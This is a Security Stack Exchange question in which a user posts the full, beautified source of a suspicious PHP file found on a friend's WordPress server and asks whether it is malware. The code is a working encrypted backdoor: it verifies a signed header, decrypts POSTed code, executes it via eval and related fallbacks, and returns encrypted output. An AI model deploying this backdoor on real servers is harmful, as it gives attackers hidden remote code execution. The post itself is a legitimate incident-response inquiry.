0

A friend found several suspicious PHP files on his server when we was upgrading his Wordpress install. They are all in the public_html folder and the filenames are the name of his domain with seemingly random digits next it.

I've "beautified" the code but, in the actual file, it is all just one long line of code (which makes me suspicious).

Here is the code...

<?php $_5fc427e4 = "aes-128-cbc";
$_be5af5e5 = "//CWWSUBSCRIPT//";
$_ca907758 =
    "LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlHZk1BMEdDU3FHU0liM0RRRUJBUVVBQTRHTkFEQ0JpUUtCZ1FDdUlla2FyWFV0MndVYm5ERCtkWDg3anJWcQpmbUQ0a2IzUU16d1NsY01rMWp2K1hLd3p0SGI0ejdzT3VGYnBoR0ZFS3pveVpzL0Izd2tLUFJReDdONmlQQVdOCjR2U3B1ek50QWorbzFxYkxsMmNyOXhpT1NRbzh0eXFMb0tJM3VmaTNRMEpxbnVubHpKSHJMYWpJR3ZBejU0ZWwKTndBdFdPQjJKV1RNS3FlMG93SURBUUFCCi0tLS0tRU5EIFBVQkxJQyBLRVktLS0tLQo=";
$VERSION = "0.3.0";
$ID =
    $VERSION .
    " php-" .
    PHP_VERSION .
    "/" .
    PHP_OS .
    "/" .
    $_SERVER["SERVER_SOFTWARE"];
error_reporting(0);
@set_time_limit(3600);
@ini_set("implicit_flush", "On");
@ini_set("default_socket_timeout", "3600");
@ini_set("file_uploads", "On");
@ini_set("max_execution_time", "3600");
@ini_set("max_input_time", "3600");
@ini_set("upload_max_filesize", "32M");
@ini_set("post_max_size", "32M");
$_b632135e = $_SERVER["REQUEST_METHOD"][0]
    ? $_SERVER["REQUEST_METHOD"][0]
    : "P";
if ($_b632135e == "G") {
    if (isset($_GET["debug"]) && _f454d8cb("./cwwdebug.data", $_GET["debug"])) {
        error_reporting(-1);
        _99412630();
        exit();
    }
}
if ($_b632135e != "P") {
    _b8e6b0c7(10);
}
$_7a03a6d6 = false;
foreach ($_SERVER as $_52b6f489 => $_7a03a6d6) {
    if (strtolower($_52b6f489) == "http_x_cww_tag") {
        $_7a03a6d6 = pack("H*", $_7a03a6d6);
        break;
    }
}
if ($_7a03a6d6 === false) {
    _b8e6b0c7(20);
}
$_897afce9 = false;
$_2ae84ba2 = openssl_pkey_get_public(base64_decode($_ca907758));
openssl_public_decrypt($_7a03a6d6, $_897afce9, $_2ae84ba2);
openssl_free_key($_2ae84ba2);
if (!$_897afce9) {
    _b8e6b0c7(30);
}
$_0496934c = preg_match_all(
    '/^([0-9]{10}):([0-9a-f]{32}):([0-9a-f]{32})$/i',
    $_897afce9,
    $_ed0783be
);
if (!$_0496934c) {
    _b8e6b0c7(40);
}
if ($_ed0783be[1][0] < time()) {
    _b8e6b0c7(50);
}
$_011ea5f3 = [];
$_011ea5f3[0] = pack("H*", $_ed0783be[2][0]);
$_011ea5f3[1] = pack("H*", $_ed0783be[3][0]);
if (eval("return 1;")) {
    $_6ebae9e7 = 1;
} elseif (is_callable("create_function")) {
    $_6ebae9e7 = 2;
} elseif (is_callable("file_put_contents")) {
    $_6ebae9e7 = 3;
} else {
    _b8e6b0c7(60);
}
$_f178c330 = [];
for ($i = 9; $i >= 0; $i--) {
    $_ffc1d021 = _35d71fd2($_POST[$i], $_f178c330[$i]);
    if ($_ffc1d021 > 0) {
        _b8e6b0c7($_ffc1d021 + 70);
    }
}
if (empty($_f178c330[9])) {
    _b8e6b0c7(80);
}
while (@ob_end_clean());
$_5daa2f51 = 32;
ob_start("_97e99099", 2);
_b8e6b0c7(0);
for ($_3713da68 = 0; $_3713da68 <= 9; $_3713da68++) {
    if (empty($_f178c330[$_3713da68])) {
        continue;
    }
    $_d84792e0 = false;
    switch ($_6ebae9e7) {
        case 1:
            if (!eval($_f178c330[$_3713da68])) {
                $_d84792e0 = true;
            }
            break;
        case 2:
            if (
                !call_user_func(create_function(null, $_f178c330[$_3713da68]))
            ) {
                $_d84792e0 = true;
            }
            break;
        case 3:
            $_2226298e = tempnam(sys_get_temp_dir(), time());
            if (
                file_put_contents(
                    $_2226298e,
                    "<?php\n" .
                        $_f178c330[$_3713da68] .
                        "\nreturn false;\n?" .
                        ">"
                )
            ) {
                if (!include $_2226298e) {
                    $_d84792e0 = true;
                }
                unlink($_2226298e);
            } else {
                $_d84792e0 = true;
            }
            break;
    }
    if ($_d84792e0) {
        _b8e6b0c7(90 + $_3713da68);
    }
}
ob_end_flush();
while (@ob_end_flush());
exit();
function _b8e6b0c7($_4a728cd2)
{
    global $ID;
    if ($_4a728cd2 > 0) {
        header("HTTP/1.1 202 $_4a728cd2");
        header("Connection: close", true);
    } else {
        header("HTTP/1.1 200 OK");
    }
    header("X-Cww-Id: " . implode(unpack("H*", $ID)));
    header("Cache-Control: must-revalidate");
    header("Pragma: no-cache");
    header("Expires: Thu,1 Jan 1970 00:00:01 GMT");
    flush();
    if (!$_4a728cd2) {
        return;
    }
    exit();
}
function _ceee992a(&$_5063af5c, &$_22acf907)
{
    global $_011ea5f3, $_5fc427e4;
    $_22acf907 = openssl_decrypt(
        $_5063af5c,
        $_5fc427e4,
        $_011ea5f3[0],
        false,
        $_011ea5f3[1]
    );
    return $_22acf907 || false;
}
function _cf76f9f4(&$_269f3677, &$_5063af5c)
{
    global $_011ea5f3, $_5fc427e4;
    $_5063af5c = openssl_encrypt(
        $_269f3677,
        $_5fc427e4,
        $_011ea5f3[0],
        false,
        $_011ea5f3[1]
    );
    return $_5063af5c || false;
}
function _2e082d06(&$_16ae1ab0, &$_298c83b2)
{
    if (function_exists("gzdecode")) {
        $_298c83b2 = gzdecode($_16ae1ab0);
        return $_298c83b2 || false;
    } elseif (substr($_16ae1ab0, 0, 3) == "\x1f\x8b\x08") {
        $_3713da68 = 10;
        $_d59a8e8c = ord(substr($_16ae1ab0, 3, 1));
        if ($_d59a8e8c > 0) {
            if ($_d59a8e8c & 4) {
                list($_c4c8650e) = unpack(
                    "v",
                    substr($_16ae1ab0, $_3713da68, 2)
                );
                $_3713da68 += 2 + $_c4c8650e;
            }
            if ($_d59a8e8c & 8) {
                $_3713da68 = strpos($_16ae1ab0, "\0", $_3713da68) + 1;
            }
            if ($_d59a8e8c & 16) {
                $_3713da68 = strpos($_16ae1ab0, "\0", $_3713da68) + 1;
            }
            if ($_d59a8e8c & 2) {
                $_3713da68 += 2;
            }
        }
        $_298c83b2 = gzinflate(substr($_16ae1ab0, $_3713da68, -8));
        return $_298c83b2 || false;
    }
    return false;
}
function _35d71fd2(&$_5063af5c, &$_22acf907)
{
    global $_be5af5e5;
    if (empty($_5063af5c)) {
        return -1;
    }
    $_16ae1ab0 = false;
    if (!_ceee992a($_5063af5c, $_16ae1ab0)) {
        return 1;
    }
    if (!_2e082d06($_16ae1ab0, $_22acf907)) {
        return 2;
    }
    $_c891de4a = strpos($_22acf907, $_be5af5e5);
    if ($_c891de4a === false || $_c891de4a != 0) {
        return 3;
    }
    return 0;
}
$_1e23290b = "";
$_ab7bcfbf = 0;
function _97e99099($_c9fd7070, $_b46ca1b2)
{
    global $_1e23290b, $_ab7bcfbf, $_5daa2f51;
    $_1e23290b .= $_c9fd7070;
    $_ab7bcfbf++;
    $_4b8df1b0 = null;
    if ($_1e23290b && ($_b46ca1b2 || $_ab7bcfbf > $_5daa2f51)) {
        global $_011ea5f3;
        $_4d08b43b = gzencode($_1e23290b);
        _cf76f9f4($_4d08b43b, $_4b8df1b0, $_011ea5f3[0], $_011ea5f3[1]);
        $_4b8df1b0 .= "\n";
        $_ab7bcfbf = 0;
        $_1e23290b = null;
    }
    return $_4b8df1b0;
}
function _f454d8cb($_81a3c9f8, $_ec530a51)
{
    if ($_68727f18 = fopen($_81a3c9f8, "r")) {
        $_f4de9e3e = fgets($_68727f18);
        fclose($_68727f18);
        return $_ec530a51 == trim($_f4de9e3e);
    }
    return false;
}
function _99412630()
{
    global $ID;
    echo "<html><pre>\n";
    echo "OUR VERSION: " . pack("H*", $ID) . "\n\n";
    echo "GLOBAL VARS:\n";
    print_r($GLOBALS);
    $_227afe03 = [
        "openssl_get_cipher_methods",
        "openssl_pkey_get_private",
        "openssl_private_decrypt",
        "openssl_decrypt",
        "openssl_encrypt",
        "gzdecode",
        "gzencode",
        "gzinflate",
        "create_function",
        "call_user_func",
        "file_put_contents",
        "tempnam",
    ];
    echo "\n\nAVAILABLE FUNCTIONS:\n";
    foreach ($_227afe03 as $f) {
        echo "$f():\te:" .
            (function_exists($f) + 0) .
            ",c:" .
            (is_callable($f) + 0) .
            "\n";
    }
    echo "\n\nCURRENT DIR AND STATS:\n";
    echo getcwd() . "\n";
    print_r(stat("."));
    if (is_callable("openssl_get_cipher_methods")) {
        echo "\n\nOPENSSL SUPPORTED METHODS:\n";
        print_r(openssl_get_cipher_methods());
    }
    echo "\n\nTHIS SERVER DATE/TIME:\n";
    echo date("r");
    if (is_callable("phpinfo")) {
        echo "\n\nPHP INFO:\n";
        ob_start();
        phpinfo();
        $_aabae31f = ob_get_contents();
        ob_end_clean();
        $_aabae31f = preg_replace("/<[^>]+>/i", "\t", $_aabae31f);
        echo "$_aabae31f\n</pre></html>";
    } else {
        echo "\n\nPHP INFO:(func is not callable)\n";
    }
} ?>

Can anyone confirm if this is malware or not? And, if so, what is it doing roughly?

Anders
  • 65,052
  • 24
  • 180
  • 218
John T
  • 101
  • 1
    Unfortunately, we are not a code analysis site. The linked duplicate will help you decipher the obfuscated code. However, you don't need to know what the code does to conclude that is it malicious. Rebuild the server from scratch. It's been compromised. – schroeder Dec 02 '22 at 13:23
  • @schroeder thank you. Yes, I was 99% sure it was malicious but I wanted to know what information they have stolen or what the code was doing just to see how "bad" it is. However, I completely get your point and those tools linked in the duplicate post are very useful so thank you for pointing me in the right drections. – John T Dec 03 '22 at 14:55

0 Answers0